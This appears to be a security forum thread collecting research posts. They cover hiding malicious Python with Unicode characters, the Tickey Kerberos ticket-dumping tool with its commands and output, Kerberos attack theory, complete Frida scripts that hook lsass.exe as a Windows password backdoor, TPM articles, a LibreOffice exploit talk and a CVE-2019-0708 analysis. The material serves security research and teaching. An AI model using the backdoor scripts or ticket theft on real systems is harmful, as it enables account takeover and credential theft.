    https://github.com/vallejocc/PoC-Hide-Python-Malscript-UnicodeChars/blob/master/malicious2_x64_shellcode.py

    The previous scripts are quite obvious and suspicious, but if this encoded malicious script and these lines are mixed into a longer and more complicated source code, probably it would be harder to notice the script contains malicious code. So, careful when you download your favorite exploits! ;)

    I have not tested it, but probably this will work with other languanges. Visual Studio for example, doesn't show this characters into a C source code.
     
  6. Tickey

    Tool to extract Kerberos tickets from Linux kernel keys.

    Based in the paper Kerberos Credential Thievery (GNU/Linux).

    Building

    git clone https://github.com/TarlogicSecurity/tickey
    cd tickey/tickey
    make CONF=Release
    

    After that, binary should be in dist/Release/GNU-Linux/.

    Execution

    Arguments:

    • -i => To perform process injection if it is needed
    • -s => To not print in output (for injection)

    Important: when injects in another process, tickey performs an execve syscall which invocates its own binary from the context of another user. Therefore, to perform a successful injection, the binary must be in a folder which all users have access, like /tmp.

    Execution example:

    [root@Lab-LSV01 /]# /tmp/tickey -i
    [*] krb5 ccache_name = KEYRING:session:sess_%{uid}
    [+] root detected, so... DUMP ALL THE TICKETS!!
    [*] Trying to inject in tarlogic[1000] session...
    [+] Successful injection at process 25723 of tarlogic[1000],look for tickets in /tmp/__krb_1000.ccache
    [*] Trying to inject in velociraptor[1120601115] session...
    [+] Successful injection at process 25794 of velociraptor[1120601115],look for tickets in /tmp/__krb_1120601115.ccache
    [*] Trying to inject in trex[1120601113] session...
    [+] Successful injection at process 25820 of trex[1120601113],look for tickets in /tmp/__krb_1120601113.ccache
    [X] [uid:0] Error retrieving tickets
    

    License

    This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

    This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more details.

    You should have received a copy of the GNU Affero General Public License along with this program. If not, see https://www.gnu.org/licenses/.

    Author

    Eloy Pérez González @Zer1t0 at @Tarlogic - https://www.tarlogic.com/en/

    Acknowledgment

    Thanks to @TheXC3LL for his support with the binary injection.

     

    Sursa: https://github.com/TarlogicSecurity/tickey

  7. Kerberos (I): How does Kerberos work? – Theory

    20 - MAR - 2019 - ELOY PÉREZ

    The objective of this series of posts is to clarify how Kerberos works, more than just introduce the attacks. This due to the fact that in many occasions it is not clear why some techniques works or not. Having this knowledge allows to know when to use any of those attacks in a pentest.

    Therefore, after a long journey of diving into the documentation and several posts about the topic, we’ve tried to write in this post all the important details which an auditor should know in order to understand how take advantage of Kerberos protocol.

    In this first post only basic functionality will be discussed. In later posts it will see how perform the attacks and how the more complex aspects works, as delegation.

    If you have any doubt about the topic which it is not well explained, do not be afraid on leave a comment or question about it. Now, onto the topic.

    What is Kerberos?

    Firstly, Kerberos is an authentication protocol, not authorization. In other words, it allows to identify each user, who provides a secret password, however, it does not validates to which resources or services can this user access.

    Kerberos is used in Active Directory. In this platform, Kerberos provides information about the privileges of each user, but it is responsability of each service to determine if the user has access to its resources.

    Kerberos items

    In this section several components of Kerberos environment will be studied.

    Transport layer

    Kerberos uses either UDP or TCP as transport protocol, which sends data in cleartext. Due to this Kerberos is responsible for providing encryption.

    Ports used by Kerberos are UDP/88 and TCP/88, which should be listen in KDC (explained in next section).

    Agents

    Several agents work together to provide authentication in Kerberos. These are the following:

    • Client or user who wants to access to the service.
    • AP (Application Server) which offers the service required by the user.
    • KDC (Key Distribution Center), the main service of Kerberos, responsible of issuing the tickets, installed on the DC (Domain Controller). It is supported by the AS (Authentication Service), which issues the TGTs.

    Encryption keys

    There are several structures handled by Kerberos, as tickets. Many of those structures are encrypted or signed in order to prevent being tampered by third parties. These keys are the following:

    • KDC or krbtgt key which is derivate from krbtgt account NTLM hash.
    • User key which is derivate from user NTLM hash.
    • Service key which is derivate from the NTLM hash of service owner, which can be an user or computer account.
    • Session key which is negotiated between the user and KDC.
    • Service session key to be use between user and service.

    Tickets

    The main structures handled by Kerberos are the tickets. These tickets are delivered to the users in order to be used by them to perform several actions in the Kerberos realm. There are 2 types:

    • The TGS (Ticket Granting Service) is the ticket which user can use to authenticate against a service. It is encrypted with the service key.
    • The TGT (Ticket Granting Ticket) is the ticket presented to the KDC to request for TGSs. It is encrypted with the KDC key.

    PAC

    The PAC (Privilege Attribute Certificate) is an structure included in almost every ticket. This structure contains the privileges of the user and it is signed with the KDC key.

    It is possible to services to verify the PAC by comunicating with the KDC, although this does not happens often. Nevertheless, the PAC verification consists of checking only its signature, without inspecting if privileges inside of PAC are correct.

    Furthermore, a client can avoid the inclusion of the PAC inside the ticket by specifying it in KERB-PA-PAC-REQUEST field of ticket request.

    Messages

    Kerberos uses differents kinds of messages. The most interesting are the following:

    • KRB_AS_REQ: Used to request the TGT to KDC.
    • KRB_AS_REP: Used to deliver the TGT by KDC.
    • KRB_TGS_REQ: Used to request the TGS to KDC, using the TGT.
    • KRB_TGS_REP: Used to deliver the TGS by KDC.
    • KRB_AP_REQ: Used to authenticate a user against a service, using the TGS.
    • KRB_AP_REP: (Optional) Used by service to identify itself against the user.
    • KRB_ERROR: Message to comunicate error conditions.

    Additionally, even if it is not part of Kerberos, but NRPC, the AP optionally could use the KERB_VERIFY_PAC_REQUEST message to send to KDC the signature of PAC, and verify if it is correct.

    Below is shown a summary of message sequency to perform authentication:

    kerberos_message_summary-300x222.png

    Kerberos messages summary

    Authentication process

    In this section, the sequency of messages to perform authentication will be studied, starting from a user without tickets, up to being authenticated against the desired service.

    KRB_AS_REQ

    Firstly, user must get a TGT from KDC. To achieve this, a KRB_AS_REQ must be sent:

    KRB_AS_REQ.png

    KRB_AS_REQ schema message

    KRB_AS_REQ has, among others, the following fields:

    • A encrypted timestamp with client key, to authenticate user and prevent replay attacks
    • Username of authenticated user
    • The service SPN asociated with krbtgt account
    • A Nonce generated by the user

    Note: the encrypted timestamp is only necessary if user requires preauthentication, which is common, except if DONT_REQ_PREAUTH flag is set in user account.

    KRB_AS_REP

    After receiving the request, the KDC verifies the user identity by decrypting the timestamp. If the message is correct, then it must respond with a KRB_AS_REP:

    KRB_AS_REP.png

    KRB_AS_REP schema message

    KRB_AS_REP includes the next information:

    • Username
    • TGT, which includes:
      • Username
      • Session key
      • Expiration date of TGT
      • PAC with user privileges, signed by KDC
    • Some encrypted data with user key, which includes:
      • Session key
      • Expiration date of TGT
      • User nonce, to prevent replay attacks

    Once finished, user already has the TGT, which can be used to request TGSs, and afterwards access to the services.

    KRB_TGS_REQ

    In order to request a TGS, a KRB_TGS_REQ message must be sent to KDC:

    KRB_TGS_REQ-1.png

    KRB_TGS_REQ schema message

    KRB_TGS_REQ includes:

    • Encrypted data with session key:
      • Username
      • Timestamp
    • TGT
    • SPN of requested service
    • Nonce generated by user

    KRB_TGS_REP

    After receiving the KRB_TGS_REQ message, the KDC returns a TGS inside of KRB_TGS_REP:

    KRB_TGS_REP.png

    KRB_TGS_REP schema message

    KRB_TGS_REP includes:

    • Username
    • TGS, which contains:
      • Service session key
      • Username
      • Expiration date of TGS
      • PAC with user privileges, signed by KDC
    • Encrypted data with session key:
      • Service session key
      • Expiration date of TGS
      • User nonce, to prevent replay attacks

    KRB_AP_REQ

    To finish, if everything went well, the user already has a valid TGS to interact with service. In order to use it, user must send to the AP a KRB_AP_REQ message:

    KRB_AP_REQ.png

    KRB_AP_REQ schema message

    KRB_AP_REQ includes:

    • TGS
    • Encrypted data with service session key:
      • Username
      • Timestamp, to avoid replay attacks

    After that, if user privileges are rigth, this can access to service. If is the case, which not usually happens, the AP will verify the PAC against the KDC. And also, if mutual authentication is needed it will respond to user with a KRB_AP_REP message.

    Attacks

    Based on previous explained authentication process the attacks oriented to compromise Active Directory will be explained in this section.

    Overpass The Hash/Pass The Key (PTK)

    The popular Pass The Hash (PTH) attack consist in using the user hash to impersonate the specific user. In the context of Kerberos this is known as Overpass The Hash o Pass The Key.

    If an attacker gets the hash of any user, he could impersonate him against the KDC and then gain access to several services.

    User hashes can be extracted from SAM files in workstations or NTDS.DIT file of DCs, as well as from the lsass process memory (by using Mimikatz) where it is also possible to find cleartext passwords.

    Pass The Ticket (PTT)

    Pass The Ticket technique is about getting an user ticket and use it to impersonate that user. However, besides the ticket, it is necessary obtain the session key too in order to use the ticket.

    It is possible obtain the ticket performing a Man-In-The-Middle attack, due to the fact that Kerberos is sent over TCP or UDP. However, this techniques does not allow get access to session key.

    An alternative is getting the ticket from lsass process memory, where also reside the session key. This procediment could be performed with Mimikatz.

    It is better to obtain a TGT, due to TGS only can be used against one service. Also, it should be taken into account that the lifetime of tickets is 10 hours, after that they are unusable.

    Golden Ticket and Silver Ticket

    The objective of Golden Ticket is to build a TGT. In this regard, it is necessary to obtain the NTLM hash of krbtgt account. Once that is obtained, a TGT with custom user and privileges can be built.

    Moreover, even if user changes his password, the ticket still will be valid. The TGT only can be invalidate if this expires or krbtgt account changes its password.

    Silver Ticket is similar, however, the built ticket is a TGS this time. In this case the service key is required, which is derived from service owner account. Nevertheless, it is not possible to sign correctly the PAC without krbtgt key. Therefore, if the service verifies the PAC, then this technique will not work.

    Kerberoasting

    Kerberoasting is a technique which takes advantage of TGS to crack the user accounts passwords offline.

    As seen above, TGS comes encrypted with service key, which is derived from service owner account NTLM hash. Usually the owners of services are the computers in which the services are being executed. However, the computer passwords are very complex, thus, it is not useful to try to crack those. This also happens in case of krbtgt account, therefore, TGT is not crackable neither.

    All the same, on some occasions the owner of service is a normal user account. In these cases it is more feasible to crack their passwords. Moreover, this sort of accounts normally have very juicy privileges. Additionally, to get a TGS for any service only a normal domain account is needed, due to Kerberos not perform authorization checks.

    ASREPRoast

    ASREPRoast is similar to Kerberoasting, that also pursues the accounts passwords cracking.

    If the attribute DONT_REQ_PREAUTH is set in a user account, then it is possible to built a KRB_AS_REQ message without specifying its password.

    After that, the KDC will respond with a KRB_AS_REP message, which will contain some information encrypted with the user key. Thus, this message can be used to crack the user password.

    Conclusion

    In this first post the Kerberos authentication process has been studied and the attacks has been also introduced. The following posts will show how to perform these attacks in a practical way and also how delegation works. I really hope that this post it helps to understand some of the more abstract concepts of Kerberos.

    References

     
  8. recreating known universal windows password backdoors with Frida

    Reading time ~20 min
    Posted by leon on 23 April 2019
    Categories: BackdoorFridaLsassWindowsPassword

    tl;dr

    I have been actively using Frida for little over a year now, but primarily on mobile devices while building the objectiontoolkit. My interest in using it on other platforms has been growing, and I decided to play with it on Windows to get a feel. I needed an objective, and decided to try port a well-known local Windows password backdoor to Frida. This post is mostly about the process of how Frida will let you quickly investigate and prototype using dynamic instrumentation.

    the setup

    Before I could do anything, I had to install and configure Frida. I used the standard Python-based Frida environment as this includes tooling for really easy, rapid development. I just had to install a Python distribution on Windows, followed by a pip install frida frida-tools.

    With Frida configured, the next question was what to target? Given that anything passwords related is usually interesting, I decided on the Windows Local Security Authority Subsystem Service (lsass.exe). I knew there was a lot of existing knowledge that could be referenced for lsass, especially when considering projects such as Mimikatz, but decided to venture down the path of discovery alone. I figured I’d start by attaching Frida to lsass.exe and enumerate the process a little. Currently loaded modules and any module exports were of interest to me. I started by simply typing frida lsass.exeto attach to the process from an elevated command prompt (Runas Administrator -> accept UAC prompt), and failed pretty hard:

    • Screenshot_2019-04-22_at_15_56_44-1024x5 RtlCreateUserThread returned 0xc0000022

    Running Frida from a PowerShell prompt worked fine though:

    • Screenshot-2019-04-22-at-16.05.07-1024x3 Frida attached to lsass.exe

    Turns out, SeDebugPrivilege was not granted by default for the command prompt in my Windows 10 installation, but was when invoking PowerShell.

    • Screenshot_2019-04-22_at_16_06_53-1024x6 SeDebugPrivilege disabled in an Administrator command prompt

    With that out of the way, lets write some scripts to enumerate lsass! I started simple, with only a Process.enumerateModules() call, iterating the results and printing the module name. This would tell me which modules were currently loaded in lsass.

    • Screenshot-2019-04-22-at-16.15.57-1024x8 lsass module enumeration

    Some Googling of the loaded DLL’s, as well as exports enumeration had me focus on the msv1_0.DLL Authentication Package first. This authentication package was described as the one responsible for local machine logons, and a prime candidate for our shenanigans. Frida has a utility called frida-trace (part of the frida-tools package) which could be used to “trace” function calls within a DLL. So, I went ahead and traced the msv1_0.dll DLL while performing a local interactive login using runas.

    • Screenshot-2019-04-22-at-16.45.14-1024x6 msv1_0.dll exports, viewed in IDA Free
    • Screenshot-2019-04-22-at-16.48.42-1024x4 frida-trace output for the msv1_0.dll when performing two local, interactive authentication actions

    As you can see, frida-trace makes it suuuuuper simple to get a quick idea of what may be happening under the hood, showing a flow of LsaApCallPackageUntrusted() -> MsvSamValidate(), followed by two LsaApLogonTerminated() calls when I invoke runas /user:user cmd. Without studying the function prototype for MsvSamValidate(), I decided to take a look at what the return values would be for the function (if any) with a simple log(retval) statement in the onLeave() function. This function was part of the autogenerated handlers that frida-trace creates for any matched methods it should trace, dumping a small JavaScript snippet in the __handlers__ directory.

    • Screenshot_2019-04-22_at_17_29_12.png MsvValidate return values

    A naive assumption at this stage was that if the supplied credentials were incorrect, MsvSamValidate() would simply return a non NULL value (which may be an error code or something). The hook does not consider what the method is actuallydoing (or that there may be further function calls that may be more interesting), especially in the case of valid authentication, but, I figured I will give overriding the return value even if an invalid set of credentials were supplied a shot. Editing the handler generated by frida-trace, I added a retval.replace(0x0) statement to the onLeave() method, and tried to auth…

    • Screenshot-2019-04-22-at-17.47.21-1024x2 One dead Windows Computer

    Turns out, LSASS is not that forgiving when you tamper with its internals :P I had no expectation that this was going to work, but, it proved an interesting exercise nonetheless. From here, I had to resort to actually understanding MsvSamValidate()before I could get anything useful done with it.

    backdoor – approach #1

    Playing with MsvSamValidate() did not yield much in terms of an interesting hook, but researching LSASS and Authentication Packages online lead me to this article which described a “universal” password backdoor for any local Windows account. I figured this may be an interesting one to look at, and so a new script began that focussed on RtlCompareMemory. According to the article, RtlCompareMemory would be called to finally compare the MD4 value from a local SAM database with a calculated MD4 of a provided password. The blog post also included some sample code to demonstrate the backdoor, which implements a hardcoded password to trigger a successful authentication scenario. From the MSDN docs, RtlCompareMemory takes three arguments where the first two are pointers. The third argument is a count for the number of bytes to compare. The function would simply return a value indicating how many bytes from the two blocks of memory were the same. In the case of an MD4 comparison, if 16 bytes were the same, then the two blocks will be considered the same, and the RtlCompareMemory function will return 0x10.

    To understand how RtlCompareMemory was used from an LSASS perspective, I decided to use frida-trace to visualise invocations of the function. This was a really cheap attempt considering that I knew this specific function was interesting. I did not have to find out which DLL’s may have this function or anything, frida-trace does all of that for us after simply specifying the name target function name.

    • Screenshot-2019-04-22-at-20.01.06-1024x4 Unfiltered RltCompareMemory invocations from within lsass.exe

    The RtlCompareMemroy function was resolved in both Kernel32.dll as well as in ntdll.dll. I focused on ntdll.dll, but it turns out it could work with either. Upon invocation, without even attempting to authenticate to anything, the output was racing past in the terminal making it impossible to follow (as you can see by the “ms” readings in the above screenshot). I needed to get the output filtered, showing only the relevant invocations. The first question I had was: “Are these calls from kernel32 or ntdll?”, so I added a module string to the autogenerated frida-trace handler to distinguish the two.

    • Screenshot-2019-04-22-at-20.15.38-1024x3 Module information added to log() calls

    Running the modified handlers, I noticed that the RtlCompareMemory function in both modules were being called, every time. Interesting. Next, I decided to log the lengths that were being compared. Maybe there is a difference? Remember, RtlCompareMemory receives a third argument for the length, so we could just dump that value from memory.

    • Screenshot-2019-04-22-at-20.20.46-1024x3 RtlCompareMemory size argument dumping

    So even the size was the same for the RtlCompareMemory calls in both of the identified modules. At this stage, I decided to focus on the function in ntdll.dll, and ignore the kernel32.dll module for now. I also dumped the bytes to screen of what was being compared so that I could get some indication of the data that was being compared. Frida has a hexdumphelper specifically for this!

    • Screenshot_2019-04-22_at_20_36_51-1024x4 RtlCompareMemory block contents

    I observed the output for a while to see if I could spot any patterns, especially while performing authentication. The password for the user account I configured was… password, and eventually, I spotted it as one of the blocks RtlCompareMemory had to compare.

    • Screenshot-2019-04-22-at-20.41.13-1024x2 ASCII, NULL padded password spotted as one of the memory blocks used in RtlCompareMemory

    I also noticed that many different block sizes were being compared using RtlCompareMemroy. As the local Windows SAM database stores the password for an account as an MD4 hash, these hashes could be represented as 16 bytes in memory. As RtlCompareMemory gets the length of bytes to compare, I decided to just filter the output to only report where 16 bytes were to be compared. This is also how the code in the previously mentioned blogpost filters candidates to check for the backdoor password. This time round, the output generated by frida-trace was much more readable and I could get a better idea of what was going on. An analysis of the output yielded the following results:

    • When providing the correct, and incorrect password to the runas command, the RtlCompareMemory function is called five times.
    • The first eight characters from the password entered will appear to be padded with a 0x00 byte between each character, most likely due to unicode encoding, making up a 16 byte stream that gets compared with something else (unknown value).
    • The fourth call to RtlCompareMemory appears to compare to the hash from the SAM database which is provided as arg[0]. The password for the test account was password, which has an MD4 hash value of 8846f7eaee8fb117ad06bdd830b7586c.
    • Screenshot-2019-04-22-at-20.58.15-1024x7 Five calls to RtlCompareMemory (incl. memory block contents) that wanted to compare 16 bytes when providing an invalid password of testing123
    • Screenshot-2019-04-22-at-20.58.26-1024x7 Five calls to RtlCompareMemory (incl. memory block contents) that wanted to compare 16 bytes when providing a valid password of password

    At this point I figured I should log the function return values as well, just to get an idea of what a success and failure condition looks like. I made two more authentication attempts using runas, one with a valid password and one with an invalid password, observing what the RtlCompareMemory function returns.

    • Screenshot-2019-04-22-at-21.10.47-1024x9 RtlCompareMemory return values

    The fourth call to RtlCompareMemory returns the number of bytes that matched in the successful case (which was actually the MD4 comparison), which should be 16 (indicated by the hex 0x10). Considering what we have learnt so far, I naively assumed I could make a “universal backdoor” by simply returning 0x10 for any call to RtlCompareMemory that wanted to compare 16 bytes, originating from within LSASS. This would mean that any password would work, right? I updated the frida-trace handler to simply retval.replace(0x10) indicating that 16 bytes matched in the onLeave method and tested!

    • Screenshot_2019-04-22_at_21_20_41-1024x8 Authentication failure after aggressively overriding the return value for RtlCompareMemory

    Instead of successfully authenticating, the number of times RtlCompareMemory got called was reduced to only two invocations (usually it would be five), and the authentication attempt completely failed, even when the correct password was provided. I wasn’t as lucky as I had hoped for. I figured this may be because of the overrides, and I may be breaking other internals where a return for RtlCompareMemory may be used in a negative test.

    For plan B, I decided to simply recreate the backdoor of the original blogpost. That means, when authenticating with a specific password, only then return that check as successful (in other words, return 0x10 from the RtlCompareMemoryfunction). We learnt in previous tests that the fourth invocation of RtlCompareMemory compares the two buffers of the calculated MD4 of the supplied password and the MD4 from the local SAM database. So, for the backdoor to trigger, we should embed the MD4 of a password we know, and trigger when that is supplied. I used a small python2 one-liner to generate an MD4 of the word backdoor formatted as an array you can use in JavaScript:

    import hashlib;print([ord(x) for x in hashlib.new('md4', 'backdoor'.encode('utf-16le')).digest()])

    When run in a python2 interpreter, the one-liner should output something like [22, 115, 28, 159, 35, 140, 92, 43, 79, 18, 148, 179, 250, 135, 82, 84]. This is a byte array that could be used in a Frida script to compare if the supplied password was backdoor, and if so, return 0x10 from the RtlCompareMemory function. This should also prevent the case where blindly returning 0x10 for any 16 byte comparison using RtlCompareMemory breaks other stuff.

    Up until now we have been using frida-trace and its autogenerated handlers to interact with the RtlCompareMemoryfunction. While this was perfect for us to quickly interact with the target function, a more robust way is preferable in the long term. Ideally, we want to make the sharing of a simple JavaScript snippet easy. To replicate the functionality we have been using up until now, we can use the Frida Interceptor API, providing the address of ntdll!RtlCompareMemory and performing our logic in there as we have in the past using the autogenerated handler. We can find the address of our function using the Module API, calling getExportByName on it.

    // from: https://github.com/sensepost/frida-windows-playground/blob/master/RtlCompareMemory_backdoor.js
    
    const RtlCompareMemory = Module.getExportByName('ntdll.dll', 'RtlCompareMemory');
    
    // generate bytearrays with python:
    // import hashlib;print([ord(x) for x in hashlib.new('md4', 'backdoor'.encode('utf-16le')).digest()])
    //const newPassword = new Uint8Array([136, 70, 247, 234, 238, 143, 177, 23, 173, 6, 189, 216, 48, 183, 88, 108]); // password
    const newPassword = new Uint8Array([22, 115, 28, 159, 35, 140, 92, 43, 79, 18, 148, 179, 250, 135, 82, 84]); // backdoor
    
    Interceptor.attach(RtlCompareMemory, {
      onEnter: function (args) {
        this.compare = 0;
        if (args[2] == 0x10) {
          const attempt = new Uint8Array(ptr(args[1]).readByteArray(16));
          this.compare = 1;
          this.original = attempt;
        }
      },
      onLeave: function (retval) {
        if (this.compare == 1) {
          var match = true;
          for (var i = 0; i != this.original.byteLength; i++) {
            if (this.original[i] != newPassword[i]) {
              match = false;
            }
          }
    
          if (match) {
            retval.replace(16);
          }
        }
      }
    });

    The resultant script means that one can authenticate using any local account with the password backdoor when invoking Frida with frida lsass.exe -l .\backdoor.js from an Administrative PowerShell prompt.

    backdoor – approach #2

    Our backdoor approach has a few limitations; the first being that network logons (such as ones initiated using smbclient) don’t appear to work with the backdoor password, the second being that I wanted any password to work, not just backdoor(or whatever you embed in the script). Using the script we have already written, I decided to take a closer look and try and figure out what was calling RtlCompareMemory.

    I love backtraces, and generating those with Frida is really simple using the backtrace() method on the Thread module. With a backtrace we should be able to see exactly where the a call to RtlCompareMemory came from and extend our investigation a litter further.

    • Screenshot-2019-04-23-at-08.07.12-1024x5 Backtraces printed for each invocation of RtlCompareMemory

    I investigated the five backtraces and found two function names that were immediately interesting. The first being MsvValidateTarget and the second being MsvpPasswordValidate. MsvpValidateTarget was being called right after MsvpSamValidate, which may explain why my initial hooking attempts failed as there may be more processing happening there. MsvpPasswordValidate was being called in the fourth invocation of RtlCompareMemory which was the call that compared two MD4 hashes when authenticating interactively as previously discussed. At this stage I Google’d the MsvpPasswordValidate function, only to find out that this method is well known for password backdoors! In fact, it’s the same method used by Inception for authentication bypasses. Awesome, I may be on the right track after all. I couldn’t quickly find a function prototype for MsvpPasswordValidate online, but a quick look in IDA free hinted towards the fact that MsvpPasswordValidate may expect seven arguments. I figured now would be a good time to hook those, and log the return value.

    • Screenshot_2019-04-23_at_08_51_21-1024x4 MsvpPasswordValidate argument and return value dump

    Using runas /user:user cmd from a command prompt and providing the correct password for the account, MsvpPasswordValidate would return 0x1, whereas providing an incorrect password would return 0x0. Seems easy enough? I modified the existing hook to simply change the return value of MsvpPasswordValidate to always be 0x1. Doing this, I was able to authenticate using any password for any valid user account, even when using network authentication!

    • Screenshot_2019-04-23_at_08_59_26-1024x8 Successful authentication, with any password for a valid user account
    // from: https://github.com/sensepost/frida-windows-playground/blob/master/MsvpPasswordValidate_backdoor.js
    
    const MsvpPasswordValidate = Module.getExportByName(null, 'MsvpPasswordValidate');
    console.log('MsvpPasswordValidate @ ' + MsvpPasswordValidate);
    
    Interceptor.attach(MsvpPasswordValidate, {
      onLeave: function (retval) {
        retval.replace(0x1);
      }
    });

    creating standalone Frida executables

    The hooks we have built so far depend heavily on the Frida python modules. This is not something you would necessarily have available on an arbitrary Windows target, making the practically of using this rather complicated. We could use something like py2exe, but that comes with its own set of bloat and things to avoid. Instead, we could build a standalone executable that bypasses the need for a python runtime entirely, in C.

    The main Frida source repository contains some example code for those that want to make use of the lower level bindings here. When choosing to go down this path, you will need decide between two types of C bindings; the one that includes the V8 JavaScript engine (frida-core/frida-gumjs), and one that does not (frida-gum). When using frida-gum, instrumentation needs to be implemented using a C API, skipping the JavaScript engine layer entirely. This has obvious wins when it comes to overall binary size, but increases the implementation complexity a little bit. Using frida-core, we could simply reuse the JavaScript hook we have already written, embedding it in an executable. But, we will be packaging the V8 engine with our executable, which is not great from a size perspective.

    A complete example of using frida-core is available here, and that is what I used as a template. The only thing I changed was how a target process ID was determined. The original code accepted a process ID as an argument, but I changed that to determine it using frida_device_get_process_by_name_sync, providing lsass.exe as the actual process PID I was interested in. The definition for this function lived in frida-core.h which you can get as part of the frida-core devkit download. Next, I embedded the MsvpPasswordValidate bypass hook and compiled the project using Visual Studio Community 2017. The result? A beefy 44MB executable that would now work regardless of the status of a Python installation. Maybe py2exe wasn’t such a bad idea after all…

    • Screenshot-2019-04-23-at-13.06.08-1024x6 Passback binary, in all of its 44mb glory, injected into LSASS.exe to allow for local authentication using any password

    Some work could be done to optimise the overall size of the resultant executable, but this would involve rebuilding the frida-core devkit from source and stripping the pieces we won’t need. An exercise left for the reader, or for me, for another day. If you are interested in building this yourself, have a look at the source code repository for passback here, opening it in Visual Studio 2017 and hitting “build”.

    summary

    If you got here, you saw how it was possible to recreate two well-known password backdoors on Windows based computers using Frida. The real world merits of where this may be useful may be small, but I believe the journey getting there is what was important. A Github repository with all of the code samples used in this post is available here.

     

    Sursa: https://sensepost.com/blog/2019/recreating-known-universal-windows-password-backdoors-with-frida/

  9. Windows Insight: The TPM

    The Windows Insight repository currently hosts three articles on the TPM (Trusted Platform Module):

    • The TPM: Communication Interfaces (Aleksandar Milenkoski😞 In this work, we discuss how the different components of the Windows 10 operating system deployed in user-land and in kernel-land, use the TPM. We focus on the communication interfaces between Windows 10 and the TPM. In addition, we discuss the construction of TPM usage profiles, that is, information on system entities communicating with the TPM as well as on communication patterns and frequencies;
    • The TPM: Integrity Measurement (Aleksandar Milenkoski😞 In this work, we discuss the integrity measurement mechanism of Windows 10 and the role that the TPM plays
      as part of it. This mechanism, among other things, implements the production of measurement data. This involves calculation of hashes of relevant executable files or of code sequences at every system startup. It also involves the storage of these hashes and relevant related data in log files for later analysis;

     

    • The TPM: Workflow of the Manual and Automatic TPM Provisioning Processes (Aleksandar Milenkoski😞 In this work, we describe the implementation of the TPM provisioning process in Windows 10. We first define the term TPM provisioning in order to set the scope of this work. Under TPM provisioning, we understand activities storing data in the TPM device, where the stored data is a requirement for the device to be used. This includes: authorization values, the Endorsement Key (EK), and the Storage Root Key (SRK).

     

    – Aleksandar Milenkoski

     

    Sursa: https://insinuator.net/2019/05/windows-insight-the-tpm/

  10.  

    In this talk we will explore how file formats can be abused to target the security of an end user or server, without harming a CPU register or the memory layout with a focus on the OpenDocument file format. At first a short introduction to file formats bug hunting will be given, based on my own approach. This will cover my latest Adobe PDF reader finding and will lead up to my discovery of a remote code execution in Libreoffice. It shows how a simple path traversal issue allowed me to abuse the macro feature to execute a python script installed by libreoffice and abuse it to execute any local program with parameters without any prompt. Additionally other supported scripting languages in Libreoffice as well as other interesting features will be explored and differences to OpenOffice. As software like Imagemagick is using libreoffice for file conversion, potential security issue on the server side will be explained as well. This focuses on certain problems and limitations an attacker has to work with regarding the macro support and other threats like polyglot files or local file path informations. Lastly the potential threats will be summed up to raise awareness regarding any support for file formats and what precausions should be taken. About Alex Inführ Alex Inführ As a Senior Penetration Tester with Cure53, Alex is an expert on browser security and PDF security. His cardinal skillset relates to spotting and abusing ways for uncommon script execution in MSIE, Firefox and Chrome. Alex’s additional research foci revolve around SVG security and Adobe products used in the web context. He has worked with Cure53 for multiple years with a focus on web security, JavaScript sandboxes and file format issues. He presented his research at conferences like Appsec Amsterdam, Appsec Belfast, ItSecX and mulitple OWASP chapters. As part of his research as a co-author for the 'Cure53 Browser Security White Paper', sponsored by Google, he investigated on the security of browser extensions. About Security Fest 2019 May 23rd - 24th 2019 This summer, Gothenburg will become the most secure city in Sweden! We'll have two days filled with great talks by internationally renowned speakers on some of the most cutting edge and interesting topics in IT-security! Our attendees will learn from the best and the brightest, and have a chance to get to know each other during the lunch, dinner, after-party and scheduled breaks. Please note that you have to be at least 18 years old to attend. Highlights of Security Fest Interesting IT-security talks by renowned speakers Lunch and dinner included Great CTF with nice prizes Awesome party! Venue Security Fest is held in Eriksbergshallen in Gothenburg, with an industrial decor from the time it was used as a mechanical workshop. Right next to the venue, you can stay at Quality Hotel 11.

  11. RDP Stands for “Really DO Patch!” – Understanding the Wormable RDP Vulnerability CVE-2019-0708

     

    During Microsoft’s May Patch Tuesday cycle, a security advisory was released for a vulnerability in the Remote Desktop Protocol (RDP). What was unique in this particular patch cycle was that Microsoft produced a fix for Windows XP and several other operating systems, which have not been supported for security updates in years. So why the urgency and what made Microsoft decide that this was a high risk and critical patch?

    According to the advisory, the issue discovered was serious enough that it led to Remote Code Execution and was wormable, meaning it could spread automatically on unprotected systems. The bulletin referenced well-known network worm “WannaCry” which was heavily exploited just a couple of months after Microsoft released MS17-010 as a patch for the related vulnerability in March 2017. McAfee Advanced Threat Research has been analyzing this latest bug to help prevent a similar scenario and we are urging those with unpatched and affected systems to apply the patch for CVE-2019-0708 as soon as possible. It is extremely likely malicious actors have weaponized this bug and exploitation attempts will likely be observed in the wild in the very near future.

     

    Vulnerable Operating Systems:

    • Windows 2003
    • Windows XP
    • Windows 7
    • Windows Server 2008
    • Windows Server 2008 R2

     

    Worms are viruses which primarily replicate on networks. A worm will typically execute itself automatically on a remote machine without any extra help from a user. If a virus’ primary attack vector is via the network, then it should be classified as a worm.

    The Remote Desktop Protocol (RDP) enables connection between a client and endpoint, defining the data communicated between them in virtual channels. Virtual channels are bidirectional data pipes which enable the extension of RDP. Windows Server 2000 defined 32 Static Virtual Channels (SVCs) with RDP 5.1, but due to limitations on the number of channels further defined Dynamic Virtual Channels (DVCs), which are contained within a dedicated SVC. SVCs are created at the start of a session and remain until session termination, unlike DVCs which are created and torn down on demand.

    It’s this 32 SVC binding which CVE-2019-0708 patch fixes within the _IcaBindVirtualChannels and _IcaRebindVirtualChannels functions in the RDP driver termdd.sys. As can been seen in figure 1, the RDP Connection Sequence connections are initiated and channels setup prior to Security Commencement, which enables CVE-2019-0708 to be wormable since it can self-propagate over the network once it discovers open port 3389.

     

    Screen-Shot-2019-05-21-at-2.02.33-PM.png

    Figure 1: RDP Protocol Sequence

     

    The vulnerability is due to the “MS_T120” SVC name being bound as a reference channel to the number 31 during the GCC Conference Initialization sequence of the RDP protocol. This channel name is used internally by Microsoft and there are no apparent legitimate use cases for a client to request connection over an SVC named “MS_T120.”

    Figure 2 shows legitimate channel requests during the GCC Conference Initialization sequence with no MS_T120 channel.

     

    Picture2.png

    Figure 2: Standard GCC Conference Initialization Sequence

     

